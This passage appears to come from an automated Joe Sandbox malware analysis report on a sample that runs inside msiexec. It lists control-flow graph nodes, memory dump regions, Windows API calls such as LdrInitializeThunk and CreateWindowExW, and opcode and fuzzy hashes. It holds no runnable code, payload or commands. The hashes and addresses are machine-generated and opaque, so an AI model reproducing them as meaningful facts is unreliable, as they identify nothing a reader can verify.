                                                                                                                                                              control_flow_graph 521 24509548-24509577 522 24509579 521->522 523 2450957e-24509614 521->523 522->523 525 245096b3-245096b9 523->525 526 24509619-2450962c 525->526 527 245096bf-245096d7 525->527 528 24509633-24509684 526->528 529 2450962e 526->529 530 245096d9-245096e6 527->530 531 245096eb-245096fe 527->531 548 24509686-24509694 528->548 549 24509697-245096a9 528->549 529->528 532 24509a81-24509b7e 530->532 533 24509700 531->533 534 24509705-24509721 531->534 539 24509b80-24509b85 532->539 540 24509b86-24509b90 532->540 533->534 537 24509723 534->537 538 24509728-2450974c 534->538 537->538 544 24509753-24509785 538->544 545 2450974e 538->545 539->540 553 24509787 544->553 554 2450978c-245097ce 544->554 545->544 548->527 550 245096b0 549->550 551 245096ab 549->551 550->525 551->550 553->554 556 245097d0 554->556 557 245097d5-245097de 554->557 556->557 558 24509a06-24509a0c 557->558 559 24509a12-24509a25 558->559 560 245097e3-24509808 558->560 563 24509a27 559->563 564 24509a2c-24509a47 559->564 561 2450980a 560->561 562 2450980f-24509846 560->562 561->562 572 24509848 562->572 573 2450984d-2450987f 562->573 563->564 565 24509a49 564->565 566 24509a4e-24509a62 564->566 565->566 570 24509a64 566->570 571 24509a69-24509a7f LdrInitializeThunk 566->571 570->571 571->532 572->573 575 24509881-245098a6 573->575 576 245098e3-245098f6 573->576 579 245098a8 575->579 580 245098ad-245098db 575->580 577 245098f8 576->577 578 245098fd-24509922 576->578 577->578 583 24509931-24509969 578->583 584 24509924-24509925 578->584 579->580 580->576 585 24509970-245099d1 call 24509328 583->585 586 2450996b 583->586 584->559 592 245099d3 585->592 593 245099d8-245099fc 585->593 586->585 592->593 596 24509a03 593->596 597 245099fe 593->597 596->558 597->596
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000005.00000002.2604105568.0000000024500000.00000040.00000800.00020000.00000000.sdmp, Offset: 24500000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_5_2_24500000_msiexec.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: d119060ed229682f5bb0fbc434ef9f4b5c951964dbc1ff95b5cacbf2010d5aea
                                                                                                                                                              • Instruction ID: dfb9d62e4759f571045e4d649491b6bd67480ef23f33faf39513a480072a0f9c
                                                                                                                                                              • Opcode Fuzzy Hash: d119060ed229682f5bb0fbc434ef9f4b5c951964dbc1ff95b5cacbf2010d5aea
                                                                                                                                                              • Instruction Fuzzy Hash: 17F1E274E00218CFDB14DFA9D884B9DBBB2BF88304F50D5AAE848AB355DB749985CF50

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1233 e5370-e53a0 1234 e53a7-e5484 call e41a0 call e3cc0 1233->1234 1235 e53a2 1233->1235 1245 e548b-e54a9 1234->1245 1246 e5486 1234->1246 1235->1234 1277 e54ac call e5658 1245->1277 1278 e54ac call e5649 1245->1278 1246->1245 1247 e54b2-e54bd 1248 e54bf 1247->1248 1249 e54c4-e54c8 1247->1249 1248->1249 1250 e54cd-e54d4 1249->1250 1251 e54ca-e54cb 1249->1251 1253 e54db-e54e9 1250->1253 1254 e54d6 1250->1254 1252 e54ec-e5530 1251->1252 1258 e5596-e55ad 1252->1258 1253->1252 1254->1253 1260 e55af-e55d4 1258->1260 1261 e5532-e5548 1258->1261 1267 e55ec 1260->1267 1268 e55d6-e55eb 1260->1268 1264 e554a-e5556 1261->1264 1265 e5572 1261->1265 1269 e5558-e555e 1264->1269 1270 e5560-e5566 1264->1270 1271 e5578-e5595 1265->1271 1274 e55ed 1267->1274 1268->1267 1272 e5570 1269->1272 1270->1272 1271->1258 1272->1271 1274->1274 1277->1247 1278->1247
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000005.00000002.2581440098.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_5_2_e0000_msiexec.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: 0o6p
                                                                                                                                                              • API String ID: 0-1274891241
                                                                                                                                                              • Opcode ID: 05ae47b8266aa1d32ea0a22d4680f870da57eb2fb9ceb0628715614ac7a5a28d
                                                                                                                                                              • Instruction ID: 0ba0bbe4e3a974056e5d87851fb945e9a11b2426fd29a8f1b2f02cc9dbce4236
                                                                                                                                                              • Opcode Fuzzy Hash: 05ae47b8266aa1d32ea0a22d4680f870da57eb2fb9ceb0628715614ac7a5a28d
                                                                                                                                                              • Instruction Fuzzy Hash: B261D374E006489FEB58CFA6C844A9DFBF2BF88301F248469E818BB365DB349941CF50
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000005.00000002.2581440098.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_5_2_e0000_msiexec.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 8a3c5f47992c125e838340d19f9c31a54c12fec93e73f9d3e356cc0bd053cb97
                                                                                                                                                              • Instruction ID: d1487d8d0a4d1cb34bef7923685e7c0c45dff9e890aac0e3b229d32edebef899
                                                                                                                                                              • Opcode Fuzzy Hash: 8a3c5f47992c125e838340d19f9c31a54c12fec93e73f9d3e356cc0bd053cb97
                                                                                                                                                              • Instruction Fuzzy Hash: 32519474E00248DFEB18DFA6D494A9DBBF2BF89300F248129E815BB365DB349845CF15
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000005.00000002.2581158732.00000000000BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000BD000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_5_2_bd000_msiexec.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 5dff7ca19b05b81dfe8f0c2d322e0990a8049dbaf91d77a16bc23597c33d3a0a
                                                                                                                                                              • Instruction ID: e7b4a37f0322504e8f89a9713ef7f4f8f0ba6f2726950269727d4bb45a064184
                                                                                                                                                              • Opcode Fuzzy Hash: 5dff7ca19b05b81dfe8f0c2d322e0990a8049dbaf91d77a16bc23597c33d3a0a
                                                                                                                                                              • Instruction Fuzzy Hash: 5221F571504204EFDB24DF24D9C0B66FBA1FB84314F34C96ED9494B246D77AD846CB62

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 598 424c9a-424cb7 599 424ce3-424ce7 598->599 600 424cb9-424cc6 call 423c40 598->600 602 424cfb-424d3c 599->602 603 424ce9-424cf3 599->603 607 424cc8 600->607 608 424cdc 600->608 609 424d49-424d57 602->609 610 424d3e-424d46 602->610 603->602 652 424cce call 424f40 607->652 653 424cce call 424f3f 607->653 608->599 611 424d7b-424d7d 609->611 612 424d59-424d5e 609->612 610->609 617 424d80-424d87 611->617 614 424d60-424d67 call 423c4c 612->614 615 424d69 612->615 613 424cd4-424cd6 613->608 616 424e18-424ed8 613->616 619 424d6b-424d79 614->619 615->619 647 424ee0-424f0b GetModuleHandleW 616->647 648 424eda-424edd 616->648 620 424d94-424d9b 617->620 621 424d89-424d91 617->621 619->617 622 424da8-424db1 620->622 623 424d9d-424da5 620->623 621->620 628 424db3-424dbb 622->628 629 424dbe-424dc3 622->629 623->622 628->629 630 424de1-424dee 629->630 631 424dc5-424dcc 629->631 637 424df0-424e0e 630->637 638 424e11-424e17 630->638 631->630 633 424dce-424dde call 421ba4 call 423c5c 631->633 633->630 637->638 649 424f14-424f28 647->649 650 424f0d-424f13 647->650 648->647 650->649 652->613 653->613
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00424EFE
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000005.00000002.2581850739.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_5_2_420000_msiexec.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: HandleModule
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4139908857-0
                                                                                                                                                              • Opcode ID: 4e3152120b996f0b9ade25275ebd429c66221ebb8967fc981fdc269424c5d51b
                                                                                                                                                              • Instruction ID: a6241f7ae6b9e8374e0b359d44e357c318dc80651c97d10944c0c3eacab803ec
                                                                                                                                                              • Opcode Fuzzy Hash: 4e3152120b996f0b9ade25275ebd429c66221ebb8967fc981fdc269424c5d51b
                                                                                                                                                              • Instruction Fuzzy Hash: 15813570A00B158FD724CF2AD44479ABBF1FF88304F108A2ED48AD7A51D779E94ACB95

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 654 42538c-4272f6 656 427301-427308 654->656 657 4272f8-4272fe 654->657 658 427313-4273b2 CreateWindowExW 656->658 659 42730a-427310 656->659 657->656 661 4273b4-4273ba 658->661 662 4273bb-4273f3 658->662 659->658 661->662 666 427400 662->666 667 4273f5-4273f8 662->667 668 427401 666->668 667->666 668->668
                                                                                                                                                              APIs
                                                                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 004273A2
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000005.00000002.2581850739.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_5_2_420000_msiexec.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateWindow
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 716092398-0
                                                                                                                                                              • Opcode ID: 3d6a2b84f8a10de8dce2f844ef41c4bbe01480c727e2b4cad206134c8b8e869c
                                                                                                                                                              • Instruction ID: 6e8f9e10e6339eeca8015348cd136a9f1762c4efd14a548c2b4ad1cab0c3cb02
                                                                                                                                                              • Opcode Fuzzy Hash: 3d6a2b84f8a10de8dce2f844ef41c4bbe01480c727e2b4cad206134c8b8e869c
                                                                                                                                                              • Instruction Fuzzy Hash: 3951D1B1D04359DFDB14CF9AD884ADEBBB5BF48310F64812AE818AB210D774A885CF94

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 669 4254dc-42988c 672 429892-429897 669->672 673 42993c-42995c call 4253b4 669->673 675 4298ea-429922 CallWindowProcW 672->675 676 429899-4298d0 672->676 681 42995f-42996c 673->681 678 429924-42992a 675->678 679 42992b-42993a 675->679 684 4298d2-4298d8 676->684 685 4298d9-4298e8 676->685 678->679 679->681 684->685 685->681
                                                                                                                                                              APIs
                                                                                                                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 00429911
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000005.00000002.2581850739.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_5_2_420000_msiexec.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CallProcWindow
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2714655100-0
                                                                                                                                                              • Opcode ID: 8931c6b234197ad37c2c7c4f45ae132a7e44105ac1300458caac261e3e9e19ad
                                                                                                                                                              • Instruction ID: b94842cbb575940af86ab33c0a533794738fc60733484bc6eeba2e370c833e03
                                                                                                                                                              • Opcode Fuzzy Hash: 8931c6b234197ad37c2c7c4f45ae132a7e44105ac1300458caac261e3e9e19ad
                                                                                                                                                              • Instruction Fuzzy Hash: 65414AB5A00219CFCB18CF59C448BAABBF5FF89310F24C459E419AB321D374A841CBA4

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 687 2450992c 688 245099eb-245099fc 687->688 689 24509a03-24509a0c 688->689 690 245099fe 688->690 692 24509a12-24509a25 689->692 693 245097e3-24509808 689->693 690->689 696 24509a27 692->696 697 24509a2c-24509a47 692->697 694 2450980a 693->694 695 2450980f-24509846 693->695 694->695 705 24509848 695->705 706 2450984d-2450987f 695->706 696->697 698 24509a49 697->698 699 24509a4e-24509a62 697->699 698->699 703 24509a64 699->703 704 24509a69-24509a7f LdrInitializeThunk 699->704 703->704 707 24509a81-24509b7e 704->707 705->706 712 24509881-245098a6 706->712 713 245098e3-245098f6 706->713 709 24509b80-24509b85 707->709 710 24509b86-24509b90 707->710 709->710 717 245098a8 712->717 718 245098ad-245098db 712->718 714 245098f8 713->714 715 245098fd-24509922 713->715 714->715 721 24509931-24509969 715->721 722 24509924-24509925 715->722 717->718 718->713 723 24509970-245099d1 call 24509328 721->723 724 2450996b 721->724 722->692 730 245099d3 723->730 731 245099d8-245099ea 723->731 724->723 730->731 731->688
                                                                                                                                                              APIs
                                                                                                                                                              • LdrInitializeThunk.NTDLL(00000000), ref: 24509A6E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000005.00000002.2604105568.0000000024500000.00000040.00000800.00020000.00000000.sdmp, Offset: 24500000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_5_2_24500000_msiexec.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: de8208ce9c0a54e035f8e1072af6b3c147202e913247d1cc32139b324d0757bc
                                                                                                                                                              • Instruction ID: 99c7639a8b1938d5e6605fa859a3179a384f5df4c94e3187697bc2bedc24b106
                                                                                                                                                              • Opcode Fuzzy Hash: de8208ce9c0a54e035f8e1072af6b3c147202e913247d1cc32139b324d0757bc
                                                                                                                                                              • Instruction Fuzzy Hash: 43117C78E042098FDB04DFA8D884EEDB7B9FFD8314F10D565E884A724AD734A941DB50

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 733 424f32-424f3e
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00424EFE
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000005.00000002.2581850739.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_5_2_420000_msiexec.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: HandleModule
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4139908857-0
                                                                                                                                                              • Opcode ID: fc6a7c3ee70fb8c98b3287b8218266d3dec35c3369cb305ed23eeab94d9270d9
                                                                                                                                                              • Instruction ID: f0902ae682c6ab807c4a51f4eaa2dd369fcc256b0c5446d14c417678bedd9bbe
                                                                                                                                                              • Opcode Fuzzy Hash: fc6a7c3ee70fb8c98b3287b8218266d3dec35c3369cb305ed23eeab94d9270d9
                                                                                                                                                              • Instruction Fuzzy Hash: 8C115AB69043598FDB11CF59E0403DABBF0FF85324F15819BC459AB612C379990ACFA5

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 735 424e98-424ed8 736 424ee0-424f0b GetModuleHandleW 735->736 737 424eda-424edd 735->737 738 424f14-424f28 736->738 739 424f0d-424f13 736->739 737->736 739->738
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00424EFE
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000005.00000002.2581850739.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_5_2_420000_msiexec.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: HandleModule
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4139908857-0
                                                                                                                                                              • Opcode ID: 3c845f04f10da2fa9f3b89945c0ce348cbbea60cabe61254045c582d8d9e5e01
                                                                                                                                                              • Instruction ID: a3d46eb4c8c3722dc6ab29e9619a708d5ec11690cc3669b09420600d5ed7ab94
                                                                                                                                                              • Opcode Fuzzy Hash: 3c845f04f10da2fa9f3b89945c0ce348cbbea60cabe61254045c582d8d9e5e01
                                                                                                                                                              • Instruction Fuzzy Hash: 0C1113B6D002598FDB20CF9AD444BDEFBF4EF88314F10841AD818A7600C379A545CFA5

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 741 42af78-42bdfa OleInitialize 743 42be03-42be20 741->743 744 42bdfc-42be02 741->744 744->743
                                                                                                                                                              APIs
                                                                                                                                                              • OleInitialize.OLE32(00000000), ref: 0042BDED
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000005.00000002.2581850739.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_5_2_420000_msiexec.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Initialize
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2538663250-0
                                                                                                                                                              • Opcode ID: d0f1c10191c470806f836cf73f96c7d362d0c60fa842ded47f8badb259a873af
                                                                                                                                                              • Instruction ID: cb70ecc5b5ad34f1cb514aa4f0c55591d5306ff3059c25e3213df9693b0035a8
                                                                                                                                                              • Opcode Fuzzy Hash: d0f1c10191c470806f836cf73f96c7d362d0c60fa842ded47f8badb259a873af
                                                                                                                                                              • Instruction Fuzzy Hash: D31115B59047588FDB20DF9AE444BDEFBF4EB48310F20845AD958A7300D379A944CFA5

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1318 e5362-e5364 1319 e5366-e5368 1318->1319 1320 e53c4-e5484 call e41a0 call e3cc0 1318->1320 1319->1320 1330 e548b-e54a9 1320->1330 1331 e5486 1320->1331 1362 e54ac call e5658 1330->1362 1363 e54ac call e5649 1330->1363 1331->1330 1332 e54b2-e54bd 1333 e54bf 1332->1333 1334 e54c4-e54c8 1332->1334 1333->1334 1335 e54cd-e54d4 1334->1335 1336 e54ca-e54cb 1334->1336 1338 e54db-e54e9 1335->1338 1339 e54d6 1335->1339 1337 e54ec-e5530 1336->1337 1343 e5596-e55ad 1337->1343 1338->1337 1339->1338 1345 e55af-e55d4 1343->1345 1346 e5532-e5548 1343->1346 1352 e55ec 1345->1352 1353 e55d6-e55eb 1345->1353 1349 e554a-e5556 1346->1349 1350 e5572 1346->1350 1354 e5558-e555e 1349->1354 1355 e5560-e5566 1349->1355 1356 e5578-e5595 1350->1356 1359 e55ed 1352->1359 1353->1352 1357 e5570 1354->1357 1355->1357 1356->1343 1357->1356 1359->1359 1362->1332 1363->1332
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000005.00000002.2581440098.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_5_2_e0000_msiexec.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: 0o6p
                                                                                                                                                              • API String ID: 0-1274891241
                                                                                                                                                              • Opcode ID: 133ce5c21dac8d49fbc5aa32d7aec177539b94c9ebd8e773b3fb6306a4acdbfc
                                                                                                                                                              • Instruction ID: 508a1151c337922f65e0f7f8eddba59c987eaaf9439e1f23b370301b14b94181
                                                                                                                                                              • Opcode Fuzzy Hash: 133ce5c21dac8d49fbc5aa32d7aec177539b94c9ebd8e773b3fb6306a4acdbfc
                                                                                                                                                              • Instruction Fuzzy Hash: F251C074E006488FDB54DFA6C884A9DFBF2BF89305F209469E819BB365DB349885CF10
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000005.00000002.2581440098.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_5_2_e0000_msiexec.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: b5714e0d3839435f6a157b8c704914beb10a69a095123a92ef04be0b4b19ad01
                                                                                                                                                              • Instruction ID: 19a31a180f6f47e194bf94f42f5896a3b8e4eb0732511a034e223b31feb6a0b0
                                                                                                                                                              • Opcode Fuzzy Hash: b5714e0d3839435f6a157b8c704914beb10a69a095123a92ef04be0b4b19ad01
                                                                                                                                                              • Instruction Fuzzy Hash: A212ADB80A5296CFE240AF76D5BC16E7F60FFAF3533246D02E10B84465EB798445CB26
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000005.00000002.2581440098.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_5_2_e0000_msiexec.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: b63cfecc7a630604acc5e7196fa73a9d590d4959bb2b7889b53eb5cbf859cc98
                                                                                                                                                              • Instruction ID: 1e8c6c02791df71b96e11f035ef000934387836a5c1e2e7eed0c2fcaf6c6f21d
                                                                                                                                                              • Opcode Fuzzy Hash: b63cfecc7a630604acc5e7196fa73a9d590d4959bb2b7889b53eb5cbf859cc98
                                                                                                                                                              • Instruction Fuzzy Hash: F8520874A40219CFDB58DF64DC88B8DB7B6FB88301F1086A5D80AAB368DB746D85CF51
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000005.00000002.2581440098.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_5_2_e0000_msiexec.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: f10c190961019e7ae142b9564797891daac0556dd1593d6507ffe1b404c8e243
                                                                                                                                                              • Instruction ID: 088c22640436c5199d6ce10701ed0bb0212ba2594a743a2b33fdb3dcccd538b6
                                                                                                                                                              • Opcode Fuzzy Hash: f10c190961019e7ae142b9564797891daac0556dd1593d6507ffe1b404c8e243
                                                                                                                                                              • Instruction Fuzzy Hash: 1C520874A40219CFDB58DF24DD88B8DB7B6FB88301F1086A5D80AAB368DB746D85CF51
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000005.00000002.2581440098.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_5_2_e0000_msiexec.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: e9223c19b9a3bbd88e40a7d1c04b8573fc8240919703c1a1618c3507762d9bfc
                                                                                                                                                              • Instruction ID: d4a5e160cb3f518f656448dda10a420bc4dd01daf96d810369d2af50f0116388
                                                                                                                                                              • Opcode Fuzzy Hash: e9223c19b9a3bbd88e40a7d1c04b8573fc8240919703c1a1618c3507762d9bfc
                                                                                                                                                              • Instruction Fuzzy Hash: 3491C0343042908FDB259F66D898B6E7BE2BFD9341F188569E4469B392CB39CC42C791
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000005.00000002.2581440098.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_5_2_e0000_msiexec.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 39cf94bdda90d6b7b83d88d44e0997922a88d9e6f61c7a089c1bca2671a4ccee
                                                                                                                                                              • Instruction ID: d2090a700ab0aed6f20fe0221d1d162867b384a2b647ab586dd343605473db25
                                                                                                                                                              • Opcode Fuzzy Hash: 39cf94bdda90d6b7b83d88d44e0997922a88d9e6f61c7a089c1bca2671a4ccee
                                                                                                                                                              • Instruction Fuzzy Hash: F081AE71B105458FCB68CF6AE488A6DBBF2BF99390B258169D406F7365CB32EC41CB50
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000005.00000002.2581440098.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_5_2_e0000_msiexec.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: b5528a2e6ec6cf5a73099737123020a1b0ce0f64faaff3870b9dbb66fbe5bf9d
                                                                                                                                                              • Instruction ID: 6494fb8bc1e88cdda199d1c1b54197b08740e7ae13b6e39787b5c5681a8ff000
                                                                                                                                                              • Opcode Fuzzy Hash: b5528a2e6ec6cf5a73099737123020a1b0ce0f64faaff3870b9dbb66fbe5bf9d
                                                                                                                                                              • Instruction Fuzzy Hash: 4451B574E41208CFCB08DFAAD48499DBBF2FF89300B208569E819BB325DB35A941CF50
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000005.00000002.2581440098.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_5_2_e0000_msiexec.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: c850ae6f60f8a5a8a70a76bc3b3cd4541b70a266e95a6c740cd52a9e363c1bb5
                                                                                                                                                              • Instruction ID: a80ce0d972e7d4a431ac60098a9eef2495ced6b4083b0bd0af88efc0c3c28dcd
                                                                                                                                                              • Opcode Fuzzy Hash: c850ae6f60f8a5a8a70a76bc3b3cd4541b70a266e95a6c740cd52a9e363c1bb5
                                                                                                                                                              • Instruction Fuzzy Hash: 2831C035344289EFCF159FA5D888AAF7BA6FB88301F104424F90697295CB39DD21DBA0
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000005.00000002.2581440098.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_5_2_e0000_msiexec.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 9b920d69add73f082d445c5b3d148e32321c0a98285df74766eb35ab7669c608
                                                                                                                                                              • Instruction ID: 34eb44859e8aa16d0996a1f26473d3aee335c9cc8386c9180df317765d39d503
                                                                                                                                                              • Opcode Fuzzy Hash: 9b920d69add73f082d445c5b3d148e32321c0a98285df74766eb35ab7669c608
                                                                                                                                                              • Instruction Fuzzy Hash: A421B031B401549FCB19DB69C4409AE7BE9FF9D360F60C529E809AB245DB30EE42CBD1
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000005.00000002.2581440098.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_5_2_e0000_msiexec.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 5a13da06167cb4cba30975b5f3466bedc50f2a6104bd8ae2a2f1d8556eeb0a67
                                                                                                                                                              • Instruction ID: 0f1a916135f7343d2a8dcc7d6cae2f116561952be13eef0c0d4555f17f473b69
                                                                                                                                                              • Opcode Fuzzy Hash: 5a13da06167cb4cba30975b5f3466bedc50f2a6104bd8ae2a2f1d8556eeb0a67
                                                                                                                                                              • Instruction Fuzzy Hash: 8D2107353446A18FC7259B3AD45892EBBA2BFD97917144479E806EB395CF32DC02CB90
                                                                                                                                                              Memory Dump Source
